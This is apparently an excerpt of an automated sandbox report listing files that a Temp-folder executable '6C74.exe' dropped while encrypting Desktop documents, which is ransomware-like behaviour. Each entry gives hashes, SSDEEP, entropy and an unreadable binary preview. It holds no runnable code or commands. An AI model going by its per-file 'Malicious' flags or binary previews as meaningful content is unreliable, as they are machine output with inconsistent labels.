SHA-256:	176EC6E95EEE012092F8DD3D73C09E5DF3CB61E9B9C776FC756173B49F42C6B5
SHA-512:	7CFB1C579678BB424918AC32BDB908064B2D223576A8729A9B1DA107978F96C98A6A20C52F2727D54DF89AA1C98277AC70D686475353FCE5A60304D40BD36F14
Malicious:	false
Reputation:	unknown
Preview:	LFOPO.Zy....xt.&.S...........K...5..T..Yp.n....E;..".r.3.`(..;..R.6..B.....%b#!66.,"\|;qe.;..ff...........%#i.T....Bz.S.]i..U..u.s.8..]....?m.c...@.4DR.M}.T..fB...}TG...o.T.O.8...eb+'..9..D..."......r;..B.......g.d4....Y..}4........`..../.1).....b&.......Rj..4.TM..0.z..o..}....uh.~...C.<^-. _w?t3\..P...y................=n.S.,.~r:f..\.6x.A...4Z4.92.....8..t9\S.$.K....."....)...]....$..3....k.B.r..w.l.w...#)7 .U.^..]..~fd..Y..@q/#.Px...Q.k..p.Q.[6...._83.7.`...V[F....... W\_...NX.J.`b.....\|....g..P..Y"......N.y8KM.zl%x.#Z..:..,....M...N.ML8&.;.p.Pf....R2$\|.e..\6..oDd?qR..Y..2.W....u.i.3+.Z..,..5...u........]....aQm..0..y.7@.S]INT...j_.0V.4KR.l..../@f.Z...Pui=.L...L<.;.b../..S"d...M.v.%...i..R....L...5.KsgSF..*...a..+7..\.N..\G8i.Sm9...O.._4h....H.>"..."V......Iv....}3H....D.13...9pe.9..rCr.....]].Y+.O..,..:.b..p(..^....^?.`.~..s.S..+.P_.f..0..L.N.0..x.`.....K.....Y...#G;.O.....A1....m........~..(JA......j..v.....e./&vG.\.'7..\.7G...:D>.>"w

C:\Users\user\Desktop\LHEPQPGEWF.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842491983632506
Encrypted:	false
SSDEEP:	24:9wWnfLEwDUhgJ3FW4IDEfOIFl2knogGb+hcUp62gv7Gy3QVgE4B71OiPkKQjnleM:9wOEwD4gHW8begGb+hcUDs7x3f0iPelX
MD5:	839C48810F0637969D167E7C17C314FC
SHA1:	06A3523D114FF5B00732361A5076F8639CDFCA66
SHA-256:	1F5B2C66EB026B48B9547848A2D9B4625BE606CEBF842F3F6585DC0F5696F373
SHA-512:	88A2515E2D02BEFB7AD91E99146DDE7D37A2868202A8F069BF4D7D5BA973D5445C86C9A0EAAB78A6165DB769261EC701C4C14F6B5876253CC0C58F5ADEA18F78
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ`.;..}. .qw.L..DK.!)....u....l...dkOH..$.)iN\......39.R.jN........j.......b.c..=...c..V..}...;..yO9K......JY"./..T..l..{...].Zk\...f.\.!.l.j.._.QI.e....s./.D.x...0%..Mzf.C.....n..<\|j.Gde,..-...L.{.........(H..uB6.(.p....'.b\...B.(.[.S3w.3..D.jJ...P..d.....W.._`.P`..6p.Z.{.`...nI....twi>5+....".,..z,.!U~..u.FH......h}..[.`..w.Sb....B.'t...Y!.=..$......t^.....7.a?...\|".Q ;....sC.2..........bt.F3......F......60)f...5.V0.F....[5l..Y.\K.Tf.z.sT..wj...=..P.H.....[.C{.-.._.N..@.P.[w(~.^7....Kt#KF8N.u.9..h..E....E.r@Y.%.Q..9.!.....sx....lb.._...^t@.a...7........4........bK.S..B}..F.oZ,&.Z...I.....v..G..P./.6.)..T.v.La0.%.....3....).!9..7...]^.}.trW,....9.92.&..s.L..].}AN..:....{#.6.<.?.......7f..{f...=..\....O..Cm.)..g....AZ...L.~:;t.,.....X0FibiTBu...l.b......".......J.......U..N..?Q.....=...X..^.m.z.f....%.$...R~v.6..............<0.*............z.Y...<tK.-.J..rf..!...m.Y....n.Q.(V.!P.....(..2v..4..(..=..Gl.Nl>..z...._......?....

C:\Users\user\Desktop\LHEPQPGEWF.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.842491983632506
Encrypted:	false
SSDEEP:	24:9wWnfLEwDUhgJ3FW4IDEfOIFl2knogGb+hcUp62gv7Gy3QVgE4B71OiPkKQjnleM:9wOEwD4gHW8begGb+hcUDs7x3f0iPelX
MD5:	839C48810F0637969D167E7C17C314FC
SHA1:	06A3523D114FF5B00732361A5076F8639CDFCA66
SHA-256:	1F5B2C66EB026B48B9547848A2D9B4625BE606CEBF842F3F6585DC0F5696F373
SHA-512:	88A2515E2D02BEFB7AD91E99146DDE7D37A2868202A8F069BF4D7D5BA973D5445C86C9A0EAAB78A6165DB769261EC701C4C14F6B5876253CC0C58F5ADEA18F78
Malicious:	false
Reputation:	unknown
Preview:	LHEPQ`.;..}. .qw.L..DK.!)....u....l...dkOH..$.)iN\......39.R.jN........j.......b.c..=...c..V..}...;..yO9K......JY"./..T..l..{...].Zk\...f.\.!.l.j.._.QI.e....s./.D.x...0%..Mzf.C.....n..<\|j.Gde,..-...L.{.........(H..uB6.(.p....'.b\...B.(.[.S3w.3..D.jJ...P..d.....W.._`.P`..6p.Z.{.`...nI....twi>5+....".,..z,.!U~..u.FH......h}..[.`..w.Sb....B.'t...Y!.=..$......t^.....7.a?...\|".Q ;....sC.2..........bt.F3......F......60)f...5.V0.F....[5l..Y.\K.Tf.z.sT..wj...=..P.H.....[.C{.-.._.N..@.P.[w(~.^7....Kt#KF8N.u.9..h..E....E.r@Y.%.Q..9.!.....sx....lb.._...^t@.a...7........4........bK.S..B}..F.oZ,&.Z...I.....v..G..P./.6.)..T.v.La0.%.....3....).!9..7...]^.}.trW,....9.92.&..s.L..].}AN..:....{#.6.<.?.......7f..{f...=..\....O..Cm.)..g....AZ...L.~:;t.,.....X0FibiTBu...l.b......".......J.......U..N..?Q.....=...X..^.m.z.f....%.$...R~v.6..............<0.*............z.Y...<tK.-.J..rf..!...m.Y....n.Q.(V.!P.....(..2v..4..(..=..Gl.Nl>..z...._......?....

C:\Users\user\Desktop\LIJDSFKJZG.pdf

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840335521920951
Encrypted:	false
SSDEEP:	24:qUuoRUFZOnoEeF45J3/Fh1udi9QgPXz7KpcoDAK99y/5GNR3PWbD:qUus6ZtEe6J3ZBXzGpPDP6/5GNlcD
MD5:	1D537260F4114186704604FE3B06C851
SHA1:	55328DDEE897318203B86A95B96950C5EAA718BA
SHA-256:	5DF57395E6E983BEEB0A4AE087259A0F519E81796E35FFE3401DEB1DE33D6EFA
SHA-512:	724911DCFF6301EE48842672F901207329F7D17E3E1104691ED6A4400359C357F2C0A62A383972104F621BB9FED2BF14915F94915AE429D74B026B36030CCE9B
Malicious:	false
Reputation:	unknown
Preview:	LIJDS...yI+....9..&...`..&...... PI..HW.._.......\|.%....i;..fx!.K[.Kj.f.E....Eg...2......h.>.....C.Dc.....j...d.V....DkA.2)A...../....-..\|iI.s..Z..^.H.e&kSx../#..<..`g.:Hrz...lG1"...88...W..'...)>8.0w.w....r....r.....u:L.9.YI....SA..#....6.2..u....u.T.<.......T..q........*.......`.%.Z....J.o.?_.S...I.l9.$.I...WG1nA.=tZ.>..M....h".#...{^...&..v..\|.".....Lqh}...H....mtBx.[.....p.zg..d.X=....\|h.".[....'(_...x4......\...'N...nI.".X...z....g.S.u......Y4Kq..x,......(...>.p.sO.s`..Ke.......f.{5..g...K..>...c......l.... .W..tA..m.Wb._..M..gL./...{.'.......SF].5...'&.0.Fn@..Wq\|........z9Y....(e.O8[...Z6+......7....k.^?.W..Xz.6..?...{R.Lt...R.].%j}..x.p.y.F...e.#...... ....x9."......Bp"...l..g.1...86N.../_..E+...7....@...T.4...@l.^..0..._0....[..7z......./@.J.~..i:. .~.!..Md.nJuQ._....E..QH.8..^:[.{[Gs..5^L.x[.RC...,.h6..)Us..c.6(..(...`.\1.Wg..5.~$....LC..g).JI..9+.^..C.!#.d.I%k...zMqU....P.`.,......2..e..u...)4`v...l...Q....pc.....g:}s.F..o..

C:\Users\user\Desktop\LIJDSFKJZG.pdf.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.840335521920951
Encrypted:	false
SSDEEP:	24:qUuoRUFZOnoEeF45J3/Fh1udi9QgPXz7KpcoDAK99y/5GNR3PWbD:qUus6ZtEe6J3ZBXzGpPDP6/5GNlcD
MD5:	1D537260F4114186704604FE3B06C851
SHA1:	55328DDEE897318203B86A95B96950C5EAA718BA
SHA-256:	5DF57395E6E983BEEB0A4AE087259A0F519E81796E35FFE3401DEB1DE33D6EFA
SHA-512:	724911DCFF6301EE48842672F901207329F7D17E3E1104691ED6A4400359C357F2C0A62A383972104F621BB9FED2BF14915F94915AE429D74B026B36030CCE9B
Malicious:	false
Reputation:	unknown
Preview:	LIJDS...yI+....9..&...`..&...... PI..HW.._.......\|.%....i;..fx!.K[.Kj.f.E....Eg...2......h.>.....C.Dc.....j...d.V....DkA.2)A...../....-..\|iI.s..Z..^.H.e&kSx../#..<..`g.:Hrz...lG1"...88...W..'...)>8.0w.w....r....r.....u:L.9.YI....SA..#....6.2..u....u.T.<.......T..q........*.......`.%.Z....J.o.?_.S...I.l9.$.I...WG1nA.=tZ.>..M....h".#...{^...&..v..\|.".....Lqh}...H....mtBx.[.....p.zg..d.X=....\|h.".[....'(_...x4......\...'N...nI.".X...z....g.S.u......Y4Kq..x,......(...>.p.sO.s`..Ke.......f.{5..g...K..>...c......l.... .W..tA..m.Wb._..M..gL./...{.'.......SF].5...'&.0.Fn@..Wq\|........z9Y....(e.O8[...Z6+......7....k.^?.W..Xz.6..?...{R.Lt...R.].%j}..x.p.y.F...e.#...... ....x9."......Bp"...l..g.1...86N.../_..E+...7....@...T.4...@l.^..0..._0....[..7z......./@.J.~..i:. .~.!..Md.nJuQ._....E..QH.8..^:[.{[Gs..5^L.x[.RC...,.h6..)Us..c.6(..(...`.\1.Wg..5.~$....LC..g).JI..9+.^..C.!#.d.I%k...zMqU....P.`.,......2..e..u...)4`v...l...Q....pc.....g:}s.F..o..

C:\Users\user\Desktop\NIRMEKAMZH.png

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864299913634293
Encrypted:	false
SSDEEP:	24:AUpXnFUJv0OqCXgAKQhzCMuoGDIS/gMrW8F4h9MNuosdnfRWbD:fCFjXFB5CMuow/gMCDMNuoaGD
MD5:	2E6B1FABA1B9ED4B753438857F74CB05
SHA1:	AA0C3094AAF9BDC5DC5F7ACBC36A1F6B87C0143C
SHA-256:	8F85F7D27C7FAC795EBC13F6305E76F5FA91555244E52C8A69E893F7AE6AF5E2
SHA-512:	7503E3178B557A9EF804030742BD4AD33BE7FFCF53EC80E77DE601EF6FDD3E88185920557695D4582B64AF356A27EDFB5614E03AAF97B07310BF20CE956439EE
Malicious:	false
Reputation:	unknown
Preview:	NIRME.....,..f.J`..K.i.<.!...9.Y...nX..X.._...S1.#m/........-H)..nr........R^.x.}.n..Z-..bq.{!...x.'.....1....`.................L+.S..tr.-.uN.y.l.U.\....w.pX'Y.b.....Y.C..,. ......4....+G..h..?./...!.R.jboP.,pm..e(baW.....^.8k.............W.....u.(W.}.W=fu...\m.,....,.....7....?L.>tWp.#H3E..b.xG..9.n.Z.....Itp.z&;.)...P.NZ.......L..\..O-..g;W..c...5...HW..^....g..rv..=o.!..........k...S.pU..`u..t&o<..Z..pa.Cn3.{..a..Kw..q..L..7..]Q....p.:.W.di..R.!N...U?.......x..-R{.e....".<...D..u.m..L.+.X..#.G..g...9.v.A... Dhq..%;.VS.Kg..D.v.......4..ob.......f_.A.}!$\,.B.T.^#}L....6.i"..+.Nw.o}.......gb.\|.)@.!.b...8...H ......"/.....4.s..}..5.Ywb7...PJ.........U..~F.D.!....L{c.:=/!.-t..MT.\5....=Kg.vu:.}...@s......>.X..}I.\|.G.\...4...0..._..1r.=p.da.../..[F.;....%..c....\?...T,)O..?.bD..F....m...a.l..+..(J.....[....o..Q..n...A.&.... .B..ze`...PU@.p...r...O..`$%....5.i%..Dq.....&j{y....gU...c.tV.]R..7.r/..?..+)H..9z'9...e.......p.r.8k..sG..C+.T...

C:\Users\user\Desktop\NIRMEKAMZH.png.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.864299913634293
Encrypted:	false
SSDEEP:	24:AUpXnFUJv0OqCXgAKQhzCMuoGDIS/gMrW8F4h9MNuosdnfRWbD:fCFjXFB5CMuow/gMCDMNuoaGD
MD5:	2E6B1FABA1B9ED4B753438857F74CB05
SHA1:	AA0C3094AAF9BDC5DC5F7ACBC36A1F6B87C0143C
SHA-256:	8F85F7D27C7FAC795EBC13F6305E76F5FA91555244E52C8A69E893F7AE6AF5E2
SHA-512:	7503E3178B557A9EF804030742BD4AD33BE7FFCF53EC80E77DE601EF6FDD3E88185920557695D4582B64AF356A27EDFB5614E03AAF97B07310BF20CE956439EE
Malicious:	false
Reputation:	unknown
Preview:	NIRME.....,..f.J`..K.i.<.!...9.Y...nX..X.._...S1.#m/........-H)..nr........R^.x.}.n..Z-..bq.{!...x.'.....1....`.................L+.S..tr.-.uN.y.l.U.\....w.pX'Y.b.....Y.C..,. ......4....+G..h..?./...!.R.jboP.,pm..e(baW.....^.8k.............W.....u.(W.}.W=fu...\m.,....,.....7....?L.>tWp.#H3E..b.xG..9.n.Z.....Itp.z&;.)...P.NZ.......L..\..O-..g;W..c...5...HW..^....g..rv..=o.!..........k...S.pU..`u..t&o<..Z..pa.Cn3.{..a..Kw..q..L..7..]Q....p.:.W.di..R.!N...U?.......x..-R{.e....".<...D..u.m..L.+.X..#.G..g...9.v.A... Dhq..%;.VS.Kg..D.v.......4..ob.......f_.A.}!$\,.B.T.^#}L....6.i"..+.Nw.o}.......gb.\|.)@.!.b...8...H ......"/.....4.s..}..5.Ywb7...PJ.........U..~F.D.!....L{c.:=/!.-t..MT.\5....=Kg.vu:.}...@s......>.X..}I.\|.G.\...4...0..._..1r.=p.da.../..[F.;....%..c....\?...T,)O..?.bD..F....m...a.l..+..(J.....[....o..Q..n...A.&.... .B..ze`...PU@.p...r...O..`$%....5.i%..Dq.....&j{y....gU...c.tV.]R..7.r/..?..+)H..9z'9...e.......p.r.8k..sG..C+.T...

C:\Users\user\Desktop\NWCXBPIUYI.docx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8531471585994606
Encrypted:	false
SSDEEP:	24:l3H5Bz1Vo+9AcCe9oWsdMF28CGyTo06jG4Wiw1Lz9O+lVN6XINaAisq6F3597nWX:NH5ZwKAtcZPF2ab0YrHwq6N6YIAisqBD
MD5:	0F702E747D667CDF2E054F20DC3D91E7
SHA1:	B2B8BC07C6D674CAAFB482F97CD132CF5C47FF3C
SHA-256:	82501464AB0988DF13DEFC8FA820D3377DBB1F937E6FEFD153EEC6D0CED70114
SHA-512:	755AC0F3EC43D55AC98B0872DC01439EC9A337F01D2410415250626BCFF52610DA756BF10ABE90954CAA4015DD1D31AC5AED25A90F95863F0689AEB24500B6FD
Malicious:	false
Reputation:	unknown
Preview:	NWCXBCcV.5.&Qy.9..TTsy......4.....;z.-.....s.$...d".0... .%..K...Ln".?.l.,...<e...]..........$.....R.?e...h4._.C.3N:.......-!..LJ.Ec.]..M.=&..T.C.....(~..............F...\..e[...Y<.......M.....=(....2B..y.y5.1..63.fK.....9.I?y-..n.x.....:.4%.../(.Z!.74..!.....f=j..as..M0l}J......7j<{........O....I&.KQ.W.....%........p.k...g..........{......u..e.....O&;1....}Y.\.....y......#A.o...B...`.[..F<.y.$.KY..aj...~h..8....n...?..f...X....?....u.N...G...B.....W_.5F..7[...A.. .]........;.....<...(P....H.v..z.L...w...0@._)..".m..n=../.1..$..W..0Q).;...zHsTlz.P....[z4U....%....+[............/......op....-..9SjF%......[+7..Q.E..t(.0@mB)......C..!.hL...bB6...v.F..Xa.m.f......Bwb. ......w.....IL........ .!b.m[.3......q.Z\.is..f...G.ah......p.s...@}t3z.I.......=x.I..o.ngx..M.me...W..3f.!..^..`..\|...$...5....+.)#N.....9.......g...N._YV...a.5/.I>.d........o.E....7.p.wZ....Q...k.kF........pw....z..C....S......i.......u..k.&D.....M..>.z

C:\Users\user\Desktop\NWCXBPIUYI.docx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.8531471585994606
Encrypted:	false
SSDEEP:	24:l3H5Bz1Vo+9AcCe9oWsdMF28CGyTo06jG4Wiw1Lz9O+lVN6XINaAisq6F3597nWX:NH5ZwKAtcZPF2ab0YrHwq6N6YIAisqBD
MD5:	0F702E747D667CDF2E054F20DC3D91E7
SHA1:	B2B8BC07C6D674CAAFB482F97CD132CF5C47FF3C
SHA-256:	82501464AB0988DF13DEFC8FA820D3377DBB1F937E6FEFD153EEC6D0CED70114
SHA-512:	755AC0F3EC43D55AC98B0872DC01439EC9A337F01D2410415250626BCFF52610DA756BF10ABE90954CAA4015DD1D31AC5AED25A90F95863F0689AEB24500B6FD
Malicious:	false
Reputation:	unknown
Preview:	NWCXBCcV.5.&Qy.9..TTsy......4.....;z.-.....s.$...d".0... .%..K...Ln".?.l.,...<e...]..........$.....R.?e...h4._.C.3N:.......-!..LJ.Ec.]..M.=&..T.C.....(~..............F...\..e[...Y<.......M.....=(....2B..y.y5.1..63.fK.....9.I?y-..n.x.....:.4%.../(.Z!.74..!.....f=j..as..M0l}J......7j<{........O....I&.KQ.W.....%........p.k...g..........{......u..e.....O&;1....}Y.\.....y......#A.o...B...`.[..F<.y.$.KY..aj...~h..8....n...?..f...X....?....u.N...G...B.....W_.5F..7[...A.. .]........;.....<...(P....H.v..z.L...w...0@._)..".m..n=../.1..$..W..0Q).;...zHsTlz.P....[z4U....%....+[............/......op....-..9SjF%......[+7..Q.E..t(.0@mB)......C..!.hL...bB6...v.F..Xa.m.f......Bwb. ......w.....IL........ .!b.m[.3......q.Z\.is..f...G.ah......p.s...@}t3z.I.......=x.I..o.ngx..M.me...W..3f.!..^..`..\|...$...5....+.)#N.....9.......g...N._YV...a.5/.I>.d........o.E....7.p.wZ....Q...k.kF........pw....z..C....S......i.......u..k.&D.....M..>.z

C:\Users\user\Desktop\NWCXBPIUYI.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850553137392321
Encrypted:	false
SSDEEP:	24:697UzyTC246KM9HLcTnbAIFp4R2jdm+qAZ2LGwAp2DRE8obfdDQzusrxWbD:bzyTtKM9HuNyR2jI+qo2LGJ2D+dzD
MD5:	3C2DB8B888F107FE136FF3C81FE1AAE8
SHA1:	D10063FAEBF091A15BB8445F4BD85ABF6A59FFDB
SHA-256:	83698C69BF16098760AB040BCAF8D7153B8DF2F98FCEA4E01C6C6EADEA111633
SHA-512:	C5548374AEBA35349DA9CC1F07940FD2EFBA259663E5DA407C31F004482DD1276A6233CF7E4D5DE96E6DF4CF34D10A0A608B5D12DF24D498310A938C312A984B
Malicious:	true
Reputation:	unknown
Preview:	NWCXB.".z..........P....e..Jj..}..S..AH,.T.0..l.H`..$....,..e.v..5.K.N!....h.K..]..u.=... ....G..j.......P2.........#A...i..FA.5df......./.T.._7.._(0LC..:G..].{w..lp..l......NT.5....#..K..S...A/.b..:W..v).[...U=......2........E.6.......$..H...P...OR8T.....'h...I.?.JC.=..z..4.{.!..4G...L<...$.........y...p[.........Yt..[...?..>....W.1..V.<.)[........].Q.-...DM.)..9M.g...I.M=...]..0..j..8.W......{uf......G..bTF.p\.{#.....b}......e...D..l.N....2...'..A?.pTA.@.4.+......4.b<\.$\|..@K.S...C..~...<$..%U.U.~.3..k.....gr.)ysz.....iH.O..[.......'......{..q@..b..Y..Y....'..Y..E....t..=.7........B......P2....I]..j.;..1..idX........6...8...$.....3~yF..,.#.H'F..Id.k...N_e0...%E...(.....U.}.?2{5.4b.>..`.:8.C..~h..-..x....\$.....P&1.^0K..%b....c.v..fl\-/..0.@........;..p..v..e/.....P.I....v....`..y.q.L..'%.xHX.O.~.....\..A....E.I?.....1.+\.xx....n.K.\|....P?.k.H.x.....4...\|...k....49...r.`..e.j..{4....~\9..j)...B...p".......O..u..e=...)..B...v.

C:\Users\user\Desktop\NWCXBPIUYI.jpg.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.850553137392321
Encrypted:	false
SSDEEP:	24:697UzyTC246KM9HLcTnbAIFp4R2jdm+qAZ2LGwAp2DRE8obfdDQzusrxWbD:bzyTtKM9HuNyR2jI+qo2LGJ2D+dzD
MD5:	3C2DB8B888F107FE136FF3C81FE1AAE8
SHA1:	D10063FAEBF091A15BB8445F4BD85ABF6A59FFDB
SHA-256:	83698C69BF16098760AB040BCAF8D7153B8DF2F98FCEA4E01C6C6EADEA111633
SHA-512:	C5548374AEBA35349DA9CC1F07940FD2EFBA259663E5DA407C31F004482DD1276A6233CF7E4D5DE96E6DF4CF34D10A0A608B5D12DF24D498310A938C312A984B
Malicious:	false
Reputation:	unknown
Preview:	NWCXB.".z..........P....e..Jj..}..S..AH,.T.0..l.H`..$....,..e.v..5.K.N!....h.K..]..u.=... ....G..j.......P2.........#A...i..FA.5df......./.T.._7.._(0LC..:G..].{w..lp..l......NT.5....#..K..S...A/.b..:W..v).[...U=......2........E.6.......$..H...P...OR8T.....'h...I.?.JC.=..z..4.{.!..4G...L<...$.........y...p[.........Yt..[...?..>....W.1..V.<.)[........].Q.-...DM.)..9M.g...I.M=...]..0..j..8.W......{uf......G..bTF.p\.{#.....b}......e...D..l.N....2...'..A?.pTA.@.4.+......4.b<\.$\|..@K.S...C..~...<$..%U.U.~.3..k.....gr.)ysz.....iH.O..[.......'......{..q@..b..Y..Y....'..Y..E....t..=.7........B......P2....I]..j.;..1..idX........6...8...$.....3~yF..,.#.H'F..Id.k...N_e0...%E...(.....U.}.?2{5.4b.>..`.:8.C..~h..-..x....\$.....P&1.^0K..%b....c.v..fl\-/..0.@........;..p..v..e/.....P.I....v....`..y.q.L..'%.xHX.O.~.....\..A....E.I?.....1.+\.xx....n.K.\|....P?.k.H.x.....4...\|...k....49...r.`..e.j..{4....~\9..j)...B...p".......O..u..e=...)..B...v.

C:\Users\user\Desktop\NWCXBPIUYI.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845646534090269
Encrypted:	false
SSDEEP:	24:qL0Jh74Ll8YjH/Vw3IQQ/yiENX8HLRhJusTn+a2LD3dJDoAQi20DXpdC+82bebfQ:9JUPyVi4In+a23dtxXTCA7D
MD5:	F8E1FE289BE780B19EFA0A8D75245926
SHA1:	0FDD6EB87957544D2BB59B45547DAA9E634A464B
SHA-256:	2559BC3E74F92ACC83AD97106D4AEC53678E5B5A4058D88DDC35BFABB929CFD4
SHA-512:	4F6C03C8B36B14F5F2E684D37C11D2952EE50CDD00DB2123BD43D3C36F61D94C1B0370B76951B81774F8EA76E0C0DE31943E9E4731F3D003F60910B232733FA3
Malicious:	false
Reputation:	unknown
Preview:	NWCXBy.+..b.f...dO~...F......v...o.......:'.{{.wz...1..G8tzoR.......n..../..Wf\|.Rk.O.B....e.^.0..s.'..q.M..d...u....wZ.......+.='.k...+.5..cm&MOd&.3F<..a....?g...\4.Nh.....v.(\..&...f....`..1.i......7..BO..&..'......Z.k....j...8..+...z..3__....Iv.@..C...].E.Lg...7.......{.1..v..d'SQ...(..).................D.>.=.5..."l..{...[.}..4..Y.B.'mi..p.A.......l.ka...Q.D.4.....R..9........v=..zN....S.......r...f..?..8...5..@'.:..F+...?....:...2o.....7.qU..~./....V.,..mL.K...n..x1-..5E.N.-8..V1.d7.,;da...E...p.U..x.h@c.............."M...G.U.L=J..T...(L..-..e.C&.IJ.`B%.j....j...FE.SF..]=....'"VC.c...4.A..e...#.=...B`I_Q..L....B0.....R3J.+..f..Ue....y.\+.....I..-f....[...C.5.p.m..\...N+GH...-.....F:...r.U.P..9...\f=?...J...6.}OPo.....A.d4Q%\C...=.[S..xp/.-@..JD.l...E3..#.c..Q.Ie......f.........2........Kv..)...F.n^{P.............R...'j..K.,.. ..%.%3.Uqg,r3.W......l.8....?I.A..*.Q...Wk.2D.....}..IF3..>..J..Tr..>J6gc.;.Q"......dS..}.aV..J:...

C:\Users\user\Desktop\NWCXBPIUYI.xlsx.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.845646534090269
Encrypted:	false
SSDEEP:	24:qL0Jh74Ll8YjH/Vw3IQQ/yiENX8HLRhJusTn+a2LD3dJDoAQi20DXpdC+82bebfQ:9JUPyVi4In+a23dtxXTCA7D
MD5:	F8E1FE289BE780B19EFA0A8D75245926
SHA1:	0FDD6EB87957544D2BB59B45547DAA9E634A464B
SHA-256:	2559BC3E74F92ACC83AD97106D4AEC53678E5B5A4058D88DDC35BFABB929CFD4
SHA-512:	4F6C03C8B36B14F5F2E684D37C11D2952EE50CDD00DB2123BD43D3C36F61D94C1B0370B76951B81774F8EA76E0C0DE31943E9E4731F3D003F60910B232733FA3
Malicious:	false
Reputation:	unknown
Preview:	NWCXBy.+..b.f...dO~...F......v...o.......:'.{{.wz...1..G8tzoR.......n..../..Wf\|.Rk.O.B....e.^.0..s.'..q.M..d...u....wZ.......+.='.k...+.5..cm&MOd&.3F<..a....?g...\4.Nh.....v.(\..&...f....`..1.i......7..BO..&..'......Z.k....j...8..+...z..3__....Iv.@..C...].E.Lg...7.......{.1..v..d'SQ...(..).................D.>.=.5..."l..{...[.}..4..Y.B.'mi..p.A.......l.ka...Q.D.4.....R..9........v=..zN....S.......r...f..?..8...5..@'.:..F+...?....:...2o.....7.qU..~./....V.,..mL.K...n..x1-..5E.N.-8..V1.d7.,;da...E...p.U..x.h@c.............."M...G.U.L=J..T...(L..-..e.C&.IJ.`B%.j....j...FE.SF..]=....'"VC.c...4.A..e...#.=...B`I_Q..L....B0.....R3J.+..f..Ue....y.\+.....I..-f....[...C.5.p.m..\...N+GH...-.....F:...r.U.P..9...\f=?...J...6.}OPo.....A.d4Q%\C...=.[S..xp/.-@..JD.l...E3..#.c..Q.Ie......f.........2........Kv..)...F.n^{P.............R...'j..K.,.. ..%.%3.Uqg,r3.W......l.8....?I.A..*.Q...Wk.2D.....}..IF3..>..J..Tr..>J6gc.;.Q"......dS..}.aV..J:...

C:\Users\user\Desktop\NWCXBPIUYI\GNLQNHOLWB.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833022197686397
Encrypted:	false
SSDEEP:	24:Z29Ip7HMhqyLRAeE66Id9tPiNrPvVWuuC2icajkMscunAS/oYhWbD:Z2I7H5wHH6gtPiNjAePkMsfAkobD
MD5:	EBB24597D1A5CEA0B1BE34EA457D41A4
SHA1:	6D70AB4C4D40E51507FE5994CD1FF56214C0C9CB
SHA-256:	8150C929F02B794D52A5A61ED050EE6284EB60422ABD8C1C403D09734ECBEDD7
SHA-512:	E8D35C110FE6CBE40EBDFABCCFCB62EC9239DD8CB2418623B17946E6F12BFEB9C3F048FAAB938CF3F9977448345DD423167AD6FDA6842B6DF0C313EBB36A1AAD
Malicious:	false
Reputation:	unknown
Preview:	GNLQNM.......5.<n...T.p[S[....B...e.s..6(.......t...yA...b\|.}F..tV. ..: .f..>.C@F.Y....E...=U....W..&E].C.....A9l.....NE..x........_..E...D.=.h.....u......h...9..j........b_..h.....>!.h(Ubm.J...yeQp....f.7#hy..."0U......r.L..e.`.9.F._......f...:..,...H...9.e.......%.\...H.......t.5.<.X....... .......!a.r..>(.. y.p.s5.fR....Ne...f....4.e.E..o..n....3>D.H.s~].]w.x~.../..!...<f...5...zh7.1..]m.k.wP.e0..#....X..,......!....sc......E...`....6K)b.t.L8.3..N.j.qT..j;aU...S....H.p.WA.7...5..1...L..C.;.=.P...0.".V..m.-S.....W..1.6.K..z.4E.d.....N`./....L&... ...fl.7..4..l3q9.....\|..\3.UP....ZY2.&....R.T.MD.p....7U\|Za..... f..Ci{..,..'.k+.....(.e..+'.gf.......>.F..C.}..4....R..}L.h..Q..Sn......f.cw.r...N.....t...1]..D.T..0X>...J.+SN...KE.d...o0Z...m.Z....2..<.q{0........&.6g....)...0&.KC....;..d.'.#g..;6jJH}..j..I.Z....LA)!...v.s..ZojA.*.+."....\|qp.X.W..E ...OQ...i.m...y._.W...9..ku.........n.s...l.,........V..7.j..........xp%K.T.\|.(

C:\Users\user\Desktop\NWCXBPIUYI\GNLQNHOLWB.mp3.bhui (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\6C74.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.833022197686397
Encrypted:	false
SSDEEP:	24:Z29Ip7HMhqyLRAeE66Id9tPiNrPvVWuuC2icajkMscunAS/oYhWbD:Z2I7H5wHH6gtPiNjAePkMsfAkobD
MD5:	EBB24597D1A5CEA0B1BE34EA457D41A4
SHA1:	6D70AB4C4D40E51507FE5994CD1FF56214C0C9CB
SHA-256:	8150C929F02B794D52A5A61ED050EE6284EB60422ABD8C1C403D09734ECBEDD7
